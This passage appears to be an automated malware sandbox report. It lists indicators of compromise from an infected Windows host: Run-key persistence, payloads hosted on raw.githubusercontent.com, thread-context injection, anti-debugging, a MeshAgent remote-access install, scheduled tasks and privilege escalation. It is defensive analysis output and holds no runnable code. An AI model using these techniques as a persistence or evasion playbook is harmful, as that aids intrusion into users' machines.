"C:\\Users\\Admin\\sysppvrdnvs.exe" twztl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" pi.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysnldcvmr.exe" 1483322851.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Network Agent = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft Network Agent\\mswabnet.exe\"" ovrflw.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 783 raw.githubusercontent.com 14 raw.githubusercontent.com 15 raw.githubusercontent.com 529 raw.githubusercontent.com 531 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 553 ip-api.com -
Power Settings 1 TTPs 4 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 39060 powercfg.exe 39120 powercfg.exe 39088 powercfg.exe 39068 powercfg.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\exe\MeshService.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\dbghelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ws2_32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\dbgcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ntasn1.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ncrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shell32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\ole32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\DLL\wkernel32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wkernelbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\msvcrt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\advapi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\iphlpapi.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\combase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\oleaut32.pdb MeshAgent.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\0B22774DA9650D4DDD79EEAC07386987AA716C29 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\ucrtbase.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wgdi32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wgdi32full.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\shcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\wntdll.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\apphelp.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\DLL\bcrypt.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\Kernel.Appcore.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\bcryptprimitives.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\bcryptprimitives.pdb MeshAgent.exe File created C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\AA62C3769033B75A9ACB2624DC3338E100D25689 MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\gdiplus.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\comctl32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wrpcrt4.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\wuser32.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\wwin32u.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dll\msvcp_win.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\symbols\dll\sechost.pdb MeshAgent.exe File opened for modification C:\Windows\SysWOW64\dbgcore.pdb MeshAgent.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 37080 tasklist.exe 37468 tasklist.exe 15356 tasklist.exe 40568 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 55 IoCs
pid Process 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe 316 Geek_se.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 18968 set thread context of 19316 18968 winupsecvmgr.exe 242 PID 18968 set thread context of 19336 18968 winupsecvmgr.exe 243 PID 23972 set thread context of 24052 23972 crypted.exe 368 PID 27916 set thread context of 34348 27916 Ukodbcdcl.exe 518 PID 12888 set thread context of 12960 12888 chicken123.exe 569 -
Drops file in Program Files directory 8 IoCs
description ioc Process File created C:\Program Files (x86)\Mesh Agent\MeshAgent.exe meshagent32-group.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db MeshAgent.exe File opened for modification C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.db.tmp MeshAgent.exe File created C:\Program Files (x86)\Mesh Agent\MeshAgent.msh MeshAgent.exe File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\foggy-mountains.htm foggy-mountains.exe File opened for modification \??\c:\program files\common files\microsoft shared\stationery\funletters\scenic\foggy-mountains.jpg foggy-mountains.exe -
Drops file in Windows directory 17 IoCs
description ioc Process File created C:\Windows\sysppvrdnvs.exe pi.exe File opened for modification C:\Windows\sysvplervcs.exe s.exe File opened for modification C:\Windows\sysnldcvmr.exe 1548427715.exe File opened for modification C:\Windows\DpiRachel VidsUsername.exe File created C:\Windows\sysnldcvmr.exe 1548427715.exe File opened for modification C:\Windows\sysmablsvr.exe tt.exe File created C:\Windows\Tasks\Test Task17.job Ukodbcdcl.exe File created C:\Windows\sysppvrdnvs.exe twztl.exe File opened for modification C:\Windows\GtkRace DivineDialogue.exe File opened for modification C:\Windows\sysppvrdnvs.exe pi.exe File created C:\Windows\sysvplervcs.exe s.exe File opened for modification C:\Windows\TargetSki VidsUsername.exe File opened for modification C:\Windows\BirthAttacked DivineDialogue.exe File created C:\Windows\sysnldcvmr.exe 1483322851.exe File created C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\YrQueensland DivineDialogue.exe File opened for modification C:\Windows\ManualsDenver DivineDialogue.exe -
Launches sc.exe 17 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 12764 sc.exe 12852 sc.exe 12940 sc.exe 2992 sc.exe 5068 sc.exe 12716 sc.exe 2272 sc.exe 2188 sc.exe 16076 sc.exe 38316 sc.exe 4400 sc.exe 4372 sc.exe 3320 sc.exe 4980 sc.exe 4020 sc.exe 3476 sc.exe 12812 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 6 IoCs
pid pid_target Process procid_target 7104 6136 WerFault.exe 351 7420 24260 WerFault.exe 372 26604 25436 WerFault.exe 457 13056 12888 WerFault.exe 567 34336 35200 WerFault.exe 532 35464 35200 WerFault.exe 532 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 390324013.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1483322851.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2760524604.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language twztl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language VidsUsername.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language chicken123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shineencoder32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Installeraus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language utility-inst.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PCclear_Eng_mini.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Geek_se.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1740414134.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysmablsvr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DivineDialogue.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dtl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9402.tmp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language npp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysppvrdnvs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1475019939.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 255224367.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language foggy-mountains.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sysnldcvmr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pothjadwtrgh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dayum.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ukodbcdcl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1548427715.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Windows.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 53 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 15476 PING.EXE 27592 PING.EXE 14236 PING.EXE 11524 PING.EXE 16324 PING.EXE 10304 PING.EXE 2632 PING.EXE 1128 PING.EXE 2556 PING.EXE 4276 PING.EXE 5276 PING.EXE 1656 PING.EXE 19896 PING.EXE 20176 PING.EXE 20440 PING.EXE 26548 PING.EXE 23320 PING.EXE 22296 PING.EXE 6696 PING.EXE 7028 PING.EXE 26784 PING.EXE 19612 PING.EXE 21012 PING.EXE 21540 PING.EXE 11276 PING.EXE 25308 PING.EXE 34608 PING.EXE 10580 PING.EXE 8820 PING.EXE 16620 PING.EXE 5584 PING.EXE 5900 PING.EXE 7856 PING.EXE 25012 PING.EXE 21808 PING.EXE 22080 PING.EXE 20752 PING.EXE 4048 PING.EXE 16864 PING.EXE 12228 PING.EXE 24736 PING.EXE 17344 PING.EXE 18624 PING.EXE 21292 PING.EXE 22852 PING.EXE 6024 PING.EXE 8240 PING.EXE 16052 PING.EXE 10880 PING.EXE 33484 PING.EXE 18080 PING.EXE 27316 PING.EXE 32136 PING.EXE -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build_2024-07-25_20-56.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build_2024-07-25_20-56.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 pothjadwtrgh.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString pothjadwtrgh.exe -
Delays execution with timeout.exe 4 IoCs
pid Process 8592 timeout.exe 7444 timeout.exe 27820 timeout.exe 35036 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5} PCclear_Eng_mini.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024" PCclear_Eng_mini.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133764093730286896" MeshAgent.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ cfx.exe Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ cfx.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 38268 reg.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 53 IoCs
pid Process 20752 PING.EXE 22852 PING.EXE 14236 PING.EXE 33484 PING.EXE 18624 PING.EXE 10580 PING.EXE 25308 PING.EXE 24736 PING.EXE 4048 PING.EXE 1656 PING.EXE 19896 PING.EXE 8820 PING.EXE 22296 PING.EXE 7856 PING.EXE 2632 PING.EXE 16324 PING.EXE 21292 PING.EXE 22080 PING.EXE 6024 PING.EXE 27592 PING.EXE 12228 PING.EXE 8240 PING.EXE 21808 PING.EXE 26548 PING.EXE 18080 PING.EXE 21540 PING.EXE 5900 PING.EXE 16864 PING.EXE 17344 PING.EXE 19612 PING.EXE 16620 PING.EXE 5584 PING.EXE 20176 PING.EXE 7028 PING.EXE 11524 PING.EXE 11276 PING.EXE 20440 PING.EXE 2556 PING.EXE 6696 PING.EXE 34608 PING.EXE 1128 PING.EXE 23320 PING.EXE 32136 PING.EXE 15476 PING.EXE 25012 PING.EXE 21012 PING.EXE 4276 PING.EXE 10304 PING.EXE 26784 PING.EXE 16052 PING.EXE 27316 PING.EXE 5276 PING.EXE 10880 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 8604 schtasks.exe 9924 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4420 powershell.exe 4420 powershell.exe 4420 powershell.exe 1492 powershell.exe 1492 powershell.exe 1492 powershell.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 40692 Solara_Protect.exe 15436 stories.tmp 15436 stories.tmp 17016 531210104.exe 17572 99597542.exe 17572 99597542.exe 17876 816212898.exe 17876 816212898.exe 18296 3402010102.exe 18296 3402010102.exe 18640 powershell.exe 18640 powershell.exe 18640 powershell.exe 18296 3402010102.exe 18296 3402010102.exe 18968 winupsecvmgr.exe 18968 winupsecvmgr.exe 19128 powershell.exe 19128 powershell.exe 19128 powershell.exe 18968 winupsecvmgr.exe 18968 winupsecvmgr.exe 18968 winupsecvmgr.exe 18968 winupsecvmgr.exe 6052 52263531.exe 24260 build_2024-07-25_20-56.exe 24260 build_2024-07-25_20-56.exe 6264 powershell.exe 6264 powershell.exe 6264 powershell.exe 6624 powershell.exe 6624 powershell.exe 6624 powershell.exe 9300 powershell.exe 9300 powershell.exe 9300 powershell.exe 9472 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 35400 msedge.exe 35400 msedge.exe 35400 msedge.exe 35400 msedge.exe -
Suspicious behavior: SetClipboardViewer 3 IoCs
pid Process 5096 sysvplervcs.exe 2940 sysnldcvmr.exe 33236 sysmablsvr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5008 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce.exe Token: SeDebugPrivilege 4424 Office.exe Token: SeDebugPrivilege 4884 svchost.exe Token: SeDebugPrivilege 4420 powershell.exe Token: SeDebugPrivilege 1492 powershell.exe Token: SeDebugPrivilege 4036 svchost.exe Token: SeDebugPrivilege 3432 svchost.exe Token: SeDebugPrivilege 40692 Solara_Protect.exe Token: SeDebugPrivilege 8672 svchost.exe Token: SeDebugPrivilege 8632 Windows.exe Token: SeDebugPrivilege 9124 svchost.exe Token: SeDebugPrivilege 15892 svchost.exe Token: SeDebugPrivilege 16172 svchost.exe Token: SeDebugPrivilege 16424 svchost.exe Token: SeDebugPrivilege 16712 svchost.exe Token: SeDebugPrivilege 17004 svchost.exe Token: SeDebugPrivilege 17016 531210104.exe Token: SeDebugPrivilege 17572 99597542.exe Token: SeDebugPrivilege 17776 svchost.exe Token: SeDebugPrivilege 17876 816212898.exe Token: SeDebugPrivilege 18412 svchost.exe Token: SeDebugPrivilege 18640 powershell.exe Token: SeIncreaseQuotaPrivilege 18640 powershell.exe Token: SeSecurityPrivilege 18640 powershell.exe Token: SeTakeOwnershipPrivilege 18640 powershell.exe Token: SeLoadDriverPrivilege 18640 powershell.exe Token: SeSystemProfilePrivilege 18640 powershell.exe Token: SeSystemtimePrivilege 18640 powershell.exe Token: SeProfSingleProcessPrivilege 18640 powershell.exe Token: SeIncBasePriorityPrivilege 18640 powershell.exe Token: SeCreatePagefilePrivilege 18640 powershell.exe Token: SeBackupPrivilege 18640 powershell.exe Token: SeRestorePrivilege 18640 powershell.exe Token: SeShutdownPrivilege 18640 powershell.exe Token: SeDebugPrivilege 18640 powershell.exe Token: SeSystemEnvironmentPrivilege 18640 powershell.exe Token: SeRemoteShutdownPrivilege 18640 powershell.exe Token: SeUndockPrivilege 18640 powershell.exe Token: SeManageVolumePrivilege 18640 powershell.exe Token: 33 18640 powershell.exe Token: 34 18640 powershell.exe Token: 35 18640 powershell.exe Token: 36 18640 powershell.exe Token: SeIncreaseQuotaPrivilege 18640 powershell.exe Token: SeSecurityPrivilege 18640 powershell.exe Token: SeTakeOwnershipPrivilege 18640 powershell.exe Token: SeLoadDriverPrivilege 18640 powershell.exe Token: SeSystemProfilePrivilege 18640 powershell.exe Token: SeSystemtimePrivilege 18640 powershell.exe Token: SeProfSingleProcessPrivilege 18640 powershell.exe Token: SeIncBasePriorityPrivilege 18640 powershell.exe Token: SeCreatePagefilePrivilege 18640 powershell.exe Token: SeBackupPrivilege 18640 powershell.exe Token: SeRestorePrivilege 18640 powershell.exe Token: SeShutdownPrivilege 18640 powershell.exe Token: SeDebugPrivilege 18640 powershell.exe Token: SeSystemEnvironmentPrivilege 18640 powershell.exe Token: SeRemoteShutdownPrivilege 18640 powershell.exe Token: SeUndockPrivilege 18640 powershell.exe Token: SeManageVolumePrivilege 18640 powershell.exe Token: 33 18640 powershell.exe Token: 34 18640 powershell.exe Token: 35 18640 powershell.exe Token: 36 18640 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 15436 stories.tmp 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe 19336 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
